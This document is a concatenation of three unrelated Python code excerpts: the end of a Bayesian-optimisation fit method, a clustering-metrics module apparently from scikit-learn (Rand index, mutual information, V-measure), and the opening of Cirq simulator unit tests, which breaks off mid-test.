self.bo = BayesOptSearch(self, X, self.param_bounds, n_initial=self.num_initial_evaluations)
best_params = self.bo.optimize(self.num_iter)
else:
logger.info("Bayesian optimisation using prior model.")
self.bo.re_initialise(X, self.n_initial_relearn)
best_params = self.bo.optimize(self.n_iter_relearn)
self.set_parameters_from_dict(best_params)
self.learning_parameters = False
logger.info("Learnt %s" % str(self.get_parameters()))
# standard fit call from superclass
KernelExpLiteGaussianLowRank.fit(self, X)
| |
"""Utilities to evaluate the clustering performance of models.
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# Arnaud Fouchet <foucheta@gmail.com>
# Thierry Guillemot <thierry.guillemot.work@gmail.com>
# Gregory Stupp <stuppie@gmail.com>
# Joel Nothman <joel.nothman@gmail.com>
# Arya McCarthy <arya@jhu.edu>
# License: BSD 3 clause
from math import log
import numpy as np
from scipy import sparse as sp
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.validation import check_array
from ...utils.fixes import comb, _astype_copy_false
def _comb2(n):
# the exact version is faster for k == 2: use it by default globally in
# this module instead of the float approximate variant
return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
"""Check that the labels arrays are 1D and of same dimension.
Parameters
----------
labels_true : int array, shape = [n_samples]
The true labels
labels_pred : int array, shape = [n_samples]
The predicted labels
"""
labels_true = np.asarray(labels_true)
labels_pred = np.asarray(labels_pred)
# input checks
if labels_true.ndim != 1:
raise ValueError(
"labels_true must be 1D: shape is %r" % (labels_true.shape,))
if labels_pred.ndim != 1:
raise ValueError(
"labels_pred must be 1D: shape is %r" % (labels_pred.shape,))
if labels_true.shape != labels_pred.shape:
raise ValueError(
"labels_true and labels_pred must have same size, got %d and %d"
% (labels_true.shape[0], labels_pred.shape[0]))
return labels_true, labels_pred
def _generalized_average(U, V, average_method):
"""Return a particular mean of two numbers."""
if average_method == "min":
return min(U, V)
elif average_method == "geometric":
return np.sqrt(U * V)
elif average_method == "arithmetic":
return np.mean([U, V])
elif average_method == "max":
return max(U, V)
else:
raise ValueError("'average_method' must be 'min', 'geometric', "
"'arithmetic', or 'max'")
def contingency_matrix(labels_true, labels_pred, eps=None, sparse=False):
"""Build a contingency matrix describing the relationship between labels.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
eps : None or float, optional.
If a float, that value is added to all values in the contingency
matrix. This helps to stop NaN propagation.
If ``None``, nothing is adjusted.
sparse : boolean, optional.
If True, return a sparse CSR continency matrix. If ``eps is not None``,
and ``sparse is True``, will throw ValueError.
.. versionadded:: 0.18
Returns
-------
contingency : {array-like, sparse}, shape=[n_classes_true, n_classes_pred]
Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples in
true class :math:`i` and in predicted class :math:`j`. If
``eps is None``, the dtype of this array will be integer. If ``eps`` is
given, the dtype will be float.
Will be a ``scipy.sparse.csr_matrix`` if ``sparse=True``.
"""
if eps is not None and sparse:
raise ValueError("Cannot set 'eps' when sparse=True")
classes, class_idx = np.unique(labels_true, return_inverse=True)
clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
n_classes = classes.shape[0]
n_clusters = clusters.shape[0]
# Using coo_matrix to accelerate simple histogram calculation,
# i.e. bins are consecutive integers
# Currently, coo_matrix is faster than histogram2d for simple cases
contingency = sp.coo_matrix((np.ones(class_idx.shape[0]),
(class_idx, cluster_idx)),
shape=(n_classes, n_clusters),
dtype=np.int)
if sparse:
contingency = contingency.tocsr()
contingency.sum_duplicates()
else:
contingency = contingency.toarray()
if eps is not None:
# don't use += as contingency is integer
contingency = contingency + eps
return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred):
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_score(a, b) == adjusted_rand_score(b, a)
Read more in the :ref:`User Guide <adjusted_rand_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
Returns
-------
ari : float
Similarity score between -1.0 and 1.0. Random labelings have an ARI
close to 0.0. 1.0 stands for perfect match.
Examples
--------
Perfectly matching labelings have a score of 1 even
>>> from sklearn.metrics.cluster import adjusted_rand_score
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> adjusted_rand_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not always pure, hence penalized::
>>> adjusted_rand_score([0, 0, 1, 2], [0, 0, 1, 1])
0.57...
ARI is symmetric, so labelings that have pure clusters with members
coming from the same classes but unnecessary splits are penalized::
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 2])
0.57...
If classes members are completely split across different clusters, the
assignment is totally incomplete, hence the ARI is very low::
>>> adjusted_rand_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [Hubert1985] L. Hubert and P. Arabie, Comparing Partitions,
Journal of Classification 1985
https://link.springer.com/article/10.1007%2FBF01908075
.. [wk] https://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index
See also
--------
adjusted_mutual_info_score: Adjusted Mutual Information
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
n_classes = np.unique(labels_true).shape[0]
n_clusters = np.unique(labels_pred).shape[0]
# Special limit cases: no clustering since the data is not split;
# or trivial clustering where each document is assigned a unique cluster.
# These are perfect matches hence return 1.0.
if (n_classes == n_clusters == 1 or
n_classes == n_clusters == 0 or
n_classes == n_clusters == n_samples):
return 1.0
# Compute the ARI using the contingency data
contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
sum_comb_c = sum(_comb2(n_c) for n_c in np.ravel(contingency.sum(axis=1)))
sum_comb_k = sum(_comb2(n_k) for n_k in np.ravel(contingency.sum(axis=0)))
sum_comb = sum(_comb2(n_ij) for n_ij in contingency.data)
prod_comb = (sum_comb_c * sum_comb_k) / _comb2(n_samples)
mean_comb = (sum_comb_k + sum_comb_c) / 2.
return (sum_comb - prod_comb) / (mean_comb - prod_comb)
def homogeneity_completeness_v_measure(labels_true, labels_pred, beta=1.0):
"""Compute the homogeneity and completeness and V-Measure scores at once.
Those metrics are based on normalized conditional entropy measures of
the clustering labeling to evaluate given the knowledge of a Ground
Truth class labels of the same samples.
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
Both scores have positive values between 0.0 and 1.0, larger values
being desirable.
Those 3 metrics are independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score values in any way.
V-Measure is furthermore symmetric: swapping ``labels_true`` and
``label_pred`` will give the same score. This does not hold for
homogeneity and completeness. V-Measure is identical to
:func:`normalized_mutual_info_score` with the arithmetic averaging
method.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
beta : float
Ratio of weight attributed to ``homogeneity`` vs ``completeness``.
If ``beta`` is greater than 1, ``completeness`` is weighted more
strongly in the calculation. If ``beta`` is less than 1,
``homogeneity`` is weighted more strongly.
Returns
-------
homogeneity : float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
completeness : float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
v_measure : float
harmonic mean of the first two
See also
--------
homogeneity_score
completeness_score
v_measure_score
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
if len(labels_true) == 0:
return 1.0, 1.0, 1.0
entropy_C = entropy(labels_true)
entropy_K = entropy(labels_pred)
contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
MI = mutual_info_score(None, None, contingency=contingency)
homogeneity = MI / (entropy_C) if entropy_C else 1.0
completeness = MI / (entropy_K) if entropy_K else 1.0
if homogeneity + completeness == 0.0:
v_measure_score = 0.0
else:
v_measure_score = ((1 + beta) * homogeneity * completeness
/ (beta * homogeneity + completeness))
return homogeneity, completeness, v_measure_score
def homogeneity_score(labels_true, labels_pred):
"""Homogeneity metric of a cluster labeling given a ground truth.
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`completeness_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
homogeneity : float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
completeness_score
v_measure_score
Examples
--------
Perfect labelings are homogeneous::
>>> from sklearn.metrics.cluster import homogeneity_score
>>> homogeneity_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that further split classes into more clusters can be
perfectly homogeneous::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 1, 2]))
1.000000
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 2, 3]))
1.000000
Clusters that include samples from different classes do not make for an
homogeneous labeling::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 0, 1]))
0.0...
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 0, 0]))
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred)[0]
def completeness_score(labels_true, labels_pred):
"""Completeness metric of a cluster labeling given a ground truth.
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`homogeneity_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
completeness : float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
v_measure_score
Examples
--------
Perfect labelings are complete::
>>> from sklearn.metrics.cluster import completeness_score
>>> completeness_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that assign all classes members to the same clusters
are still complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 0, 0, 0]))
1.0
>>> print(completeness_score([0, 1, 2, 3], [0, 0, 1, 1]))
0.999...
If classes members are split across different clusters, the
assignment cannot be complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 1, 0, 1]))
0.0
>>> print(completeness_score([0, 0, 0, 0], [0, 1, 2, 3]))
0.0
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred)[1]
def v_measure_score(labels_true, labels_pred, beta=1.0):
"""V-measure cluster labeling given a ground truth.
This score is identical to :func:`normalized_mutual_info_score` with
the ``'arithmetic'`` option for averaging.
The V-measure is the harmonic mean between homogeneity and completeness::
v = (1 + beta) * homogeneity * completeness
/ (beta * homogeneity + completeness)
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
beta : float
Ratio of weight attributed to ``homogeneity`` vs ``completeness``.
If ``beta`` is greater than 1, ``completeness`` is weighted more
strongly in the calculation. If ``beta`` is less than 1,
``homogeneity`` is weighted more strongly.
Returns
-------
v_measure : float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
completeness_score
normalized_mutual_info_score
Examples
--------
Perfect labelings are both homogeneous and complete, hence have score 1.0::
>>> from sklearn.metrics.cluster import v_measure_score
>>> v_measure_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> v_measure_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not homogeneous, hence penalized::
>>> print("%.6f" % v_measure_score([0, 0, 1, 2], [0, 0, 1, 1]))
0.8...
>>> print("%.6f" % v_measure_score([0, 1, 2, 3], [0, 0, 1, 1]))
0.66...
Labelings that have pure clusters with members coming from the same
classes are homogeneous but un-necessary splits harms completeness
and thus penalize V-measure as well::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 1, 2]))
0.8...
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 1, 2, 3]))
0.66...
If classes members are completely split across different clusters,
the assignment is totally incomplete, hence the V-Measure is null::
>>> print("%.6f" % v_measure_score([0, 0, 0, 0], [0, 1, 2, 3]))
0.0...
Clusters that include samples from totally different classes totally
destroy the homogeneity of the labeling, hence::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 0, 0]))
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred,
beta=beta)[2]
def mutual_info_score(labels_true, labels_pred, contingency=None):
"""Mutual Information between two clusterings.
The Mutual Information is a measure of the similarity between two labels of
the same data. Where :math:`|U_i|` is the number of the samples
in cluster :math:`U_i` and :math:`|V_j|` is the number of the
samples in cluster :math:`V_j`, the Mutual Information
between clusterings :math:`U` and :math:`V` is given as:
.. math::
MI(U,V)=\\sum_{i=1}^{|U|} \\sum_{j=1}^{|V|} \\frac{|U_i\\cap V_j|}{N}
\\log\\frac{N|U_i \\cap V_j|}{|U_i||V_j|}
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
contingency : {None, array, sparse matrix}, \
shape = [n_classes_true, n_classes_pred]
A contingency matrix given by the :func:`contingency_matrix` function.
If value is ``None``, it will be computed, otherwise the given value is
used, with ``labels_true`` and ``labels_pred`` ignored.
Returns
-------
mi : float
Mutual information, a non-negative value
See also
--------
adjusted_mutual_info_score: Adjusted against chance Mutual Information
normalized_mutual_info_score: Normalized Mutual Information
"""
if contingency is None:
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
else:
contingency = check_array(contingency,
accept_sparse=['csr', 'csc', 'coo'],
dtype=[int, np.int32, np.int64])
if isinstance(contingency, np.ndarray):
# For an array
nzx, nzy = np.nonzero(contingency)
nz_val = contingency[nzx, nzy]
elif sp.issparse(contingency):
# For a sparse matrix
nzx, nzy, nz_val = sp.find(contingency)
else:
raise ValueError("Unsupported type for 'contingency': %s" %
type(contingency))
contingency_sum = contingency.sum()
pi = np.ravel(contingency.sum(axis=1))
pj = np.ravel(contingency.sum(axis=0))
log_contingency_nm = np.log(nz_val)
contingency_nm = nz_val / contingency_sum
# Don't need to calculate the full outer product, just for non-zeroes
outer = (pi.take(nzx).astype(np.int64, copy=False)
* pj.take(nzy).astype(np.int64, copy=False))
log_outer = -np.log(outer) + log(pi.sum()) + log(pj.sum())
mi = (contingency_nm * (log_contingency_nm - log(contingency_sum)) +
contingency_nm * log_outer)
return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred,
average_method='arithmetic'):
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [avg(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
average_method : string, optional (default: 'arithmetic')
How to compute the normalizer in the denominator. Possible options
are 'min', 'geometric', 'arithmetic', and 'max'.
.. versionadded:: 0.20
.. versionchanged:: 0.22
The default value of ``average_method`` changed from 'max' to
'arithmetic'.
Returns
-------
ami: float (upperlimited by 1.0)
The AMI returns a value of 1 when the two partitions are identical
(ie perfectly matched). Random partitions (independent labellings) have
an expected AMI around 0 on average hence can be negative.
See also
--------
adjusted_rand_score: Adjusted Rand Index
mutual_info_score: Mutual Information (not adjusted for chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import adjusted_mutual_info_score
>>> adjusted_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
... # doctest: +SKIP
1.0
>>> adjusted_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
... # doctest: +SKIP
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the AMI is null::
>>> adjusted_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
... # doctest: +SKIP
0.0
References
----------
.. [1] `Vinh, Epps, and Bailey, (2010). Information Theoretic Measures for
Clusterings Comparison: Variants, Properties, Normalization and
Correction for Chance, JMLR
<http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf>`_
.. [2] `Wikipedia entry for the Adjusted Mutual Information
<https://en.wikipedia.org/wiki/Adjusted_Mutual_Information>`_
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1 or
classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
contingency = contingency.astype(np.float64,
**_astype_copy_false(contingency))
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
emi = expected_mutual_information(contingency, n_samples)
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
normalizer = _generalized_average(h_true, h_pred, average_method)
denominator = normalizer - emi
# Avoid 0.0 / 0.0 when expectation equals maximum, i.e a perfect match.
# normalizer should always be >= emi, but because of floating-point
# representation, sometimes emi is slightly larger. Correct this
# by preserving the sign.
if denominator < 0:
denominator = min(denominator, -np.finfo('float64').eps)
else:
denominator = max(denominator, np.finfo('float64').eps)
ami = (mi - emi) / denominator
return ami
def normalized_mutual_info_score(labels_true, labels_pred,
average_method='arithmetic'):
"""Normalized Mutual Information between two clusterings.
Normalized Mutual Information (NMI) is a normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by some generalized mean of ``H(labels_true)``
and ``H(labels_pred))``, defined by the `average_method`.
This measure is not adjusted for chance. Therefore
:func:`adjusted_mutual_info_score` might be preferred.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
average_method : string, optional (default: 'arithmetic')
How to compute the normalizer in the denominator. Possible options
are 'min', 'geometric', 'arithmetic', and 'max'.
.. versionadded:: 0.20
.. versionchanged:: 0.22
The default value of ``average_method`` changed from 'geometric' to
'arithmetic'.
Returns
-------
nmi : float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
See also
--------
v_measure_score: V-Measure (NMI with arithmetic mean option.)
adjusted_rand_score: Adjusted Rand Index
adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
against chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import normalized_mutual_info_score
>>> normalized_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
... # doctest: +SKIP
1.0
>>> normalized_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
... # doctest: +SKIP
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the NMI is null::
>>> normalized_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
... # doctest: +SKIP
0.0
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1 or
classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
contingency = contingency.astype(np.float64,
**_astype_copy_false(contingency))
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
normalizer = _generalized_average(h_true, h_pred, average_method)
# Avoid 0.0 / 0.0 when either entropy is zero.
normalizer = max(normalizer, np.finfo('float64').eps)
nmi = mi / normalizer
return nmi
def fowlkes_mallows_score(labels_true, labels_pred, sparse=False):
"""Measure the similarity of two clusterings of a set of points.
The Fowlkes-Mallows index (FMI) is defined as the geometric mean between of
the precision and recall::
FMI = TP / sqrt((TP + FP) * (TP + FN))
Where ``TP`` is the number of **True Positive** (i.e. the number of pair of
points that belongs in the same clusters in both ``labels_true`` and
``labels_pred``), ``FP`` is the number of **False Positive** (i.e. the
number of pair of points that belongs in the same clusters in
``labels_true`` and not in ``labels_pred``) and ``FN`` is the number of
**False Negative** (i.e the number of pair of points that belongs in the
same clusters in ``labels_pred`` and not in ``labels_True``).
The score ranges from 0 to 1. A high value indicates a good similarity
between two clusters.
Read more in the :ref:`User Guide <fowlkes_mallows_scores>`.
Parameters
----------
labels_true : int array, shape = (``n_samples``,)
A clustering of the data into disjoint subsets.
labels_pred : array, shape = (``n_samples``, )
A clustering of the data into disjoint subsets.
sparse : bool
Compute contingency matrix internally with sparse matrix.
Returns
-------
score : float
The resulting Fowlkes-Mallows score.
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import fowlkes_mallows_score
>>> fowlkes_mallows_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> fowlkes_mallows_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
If classes members are completely split across different clusters,
the assignment is totally random, hence the FMI is null::
>>> fowlkes_mallows_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [1] `E. B. Fowkles and C. L. Mallows, 1983. "A method for comparing two
hierarchical clusterings". Journal of the American Statistical
Association
<http://wildfire.stat.ucla.edu/pdflibrary/fowlkes.pdf>`_
.. [2] `Wikipedia entry for the Fowlkes-Mallows Index
<https://en.wikipedia.org/wiki/Fowlkes-Mallows_index>`_
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples, = labels_true.shape
c = contingency_matrix(labels_true, labels_pred,
sparse=True)
c = c.astype(np.int64, **_astype_copy_false(c))
tk = np.dot(c.data, c.data) - n_samples
pk = np.sum(np.asarray(c.sum(axis=0)).ravel() ** 2) - n_samples
qk = np.sum(np.asarray(c.sum(axis=1)).ravel() ** 2) - n_samples
return np.sqrt(tk / pk) * np.sqrt(tk / qk) if tk != 0. else 0.
def entropy(labels):
"""Calculates the entropy for a labeling.
Parameters
----------
labels : int array, shape = [n_samples]
The labels
"""
if len(labels) == 0:
return 1.0
label_idx = np.unique(labels, return_inverse=True)[1]
pi = np.bincount(label_idx).astype(np.float64)
pi = pi[pi > 0]
pi_sum = np.sum(pi)
# log(a / b) should be calculated as log(a) - log(b) for
# possible loss of precision
return -np.sum((pi / pi_sum) * (np.log(pi) - log(pi_sum)))
| |
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for simulator.py"""
import abc
from typing import Generic, Dict, Any, List, Sequence, Union
from unittest import mock
import duet
import numpy as np
import pytest
import cirq
from cirq import study
from cirq.sim.simulator import (
TStepResult,
TSimulatorState,
SimulatesAmplitudes,
SimulatesExpectationValues,
SimulatesFinalState,
SimulatesIntermediateState,
SimulatesSamples,
SimulationTrialResult,
TActOnArgs,
)
class FakeSimulatesSamples(SimulatesSamples):
"""A SimulatesSamples that returns specified values from _run."""
def __init__(self, run_output: Dict[str, np.ndarray]):
self._run_output = run_output
def _run(self, *args, **kwargs) -> Dict[str, np.ndarray]:
return self._run_output
class FakeStepResult(cirq.StepResult):
def __init__(self, *, ones_qubits=None, final_state=None):
self._ones_qubits = set(ones_qubits or [])
self._final_state = final_state
def _simulator_state(self):
return self._final_state
def state_vector(self):
pass
def __setstate__(self, state):
pass
def sample(self, qubits, repetitions=1, seed=None):
return np.array([[qubit in self._ones_qubits for qubit in qubits]] * repetitions)
class SimulatesIntermediateStateImpl(
Generic[TStepResult, TSimulatorState, TActOnArgs],
SimulatesIntermediateState[TStepResult, 'SimulationTrialResult', TSimulatorState, TActOnArgs],
metaclass=abc.ABCMeta,
):
"""A SimulatesIntermediateState that uses the default SimulationTrialResult type."""
def _create_simulator_trial_result(
self,
params: study.ParamResolver,
measurements: Dict[str, np.ndarray],
final_step_result: TStepResult,
) -> 'SimulationTrialResult':
"""This method creates a default trial result.
Args:
params: The ParamResolver for this trial.
measurements: The measurement results for this trial.
final_step_result: The final step result of the simulation.
Returns:
The SimulationTrialResult.
"""
return SimulationTrialResult(
params=params, measurements=measurements, final_step_result=final_step_result
)
def test_run_simulator_run():
expected_records = {'a': np.array([[[1]]])}
simulator = FakeSimulatesSamples(expected_records)
circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
param_resolver = cirq.ParamResolver({})
expected_result = cirq.ResultDict(records=expected_records, params=param_resolver)
assert expected_result == simulator.run(
program=circuit, repetitions=10, param_resolver=param_resolver
)
def test_run_simulator_sweeps():
expected_records = {'a': np.array([[[1]]])}
simulator = FakeSimulatesSamples(expected_records)
circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
param_resolvers = [cirq.ParamResolver({}), cirq.ParamResolver({})]
expected_results = [
cirq.ResultDict(records=expected_records, params=param_resolvers[0]),
cirq.ResultDict(records=expected_records, params=param_resolvers[1]),
]
assert expected_results == simulator.run_sweep(
program=circuit, repetitions=10, params=param_resolvers
)
def test_run_simulator_sweeps_with_deprecated_run():
expected_measurements = {'a': np.array([[1]])}
simulator = FakeSimulatesSamples(expected_measurements)
circuit = cirq.Circuit(cirq.measure(cirq.LineQubit(0), key='k'))
param_resolvers = [cirq.ParamResolver({}), cirq.ParamResolver({})]
expected_records = {'a': np.array([[[1]]])}
expected_results = [
cirq.ResultDict(records=expected_records, params=param_resolvers[0]),
cirq.ResultDict(records=expected_records, params=param_resolvers[1]),
]
with cirq.testing.assert_deprecated(
'values in the output of simulator._run must be 3D',
deadline='v0.15',
):
assert expected_results == simulator.run_sweep(
program=circuit, repetitions=10, params=param_resolvers
)
@mock.patch.multiple(
SimulatesIntermediateStateImpl, __abstractmethods__=set(), simulate_moment_steps=mock.Mock()
)
def test_intermediate_simulator():
simulator = SimulatesIntermediateStateImpl()
final_simulator_state = np.array([1, 0, 0, 0])
def steps(*args, **kwargs):
result = mock.Mock()
result.measurements = {'a': [True, True]}
yield result
result = mock.Mock()
result.measurements = {'b': [True, False]}
result._simulator_state.return_value = final_simulator_state
yield result
simulator.simulate_moment_steps.side_effect = steps
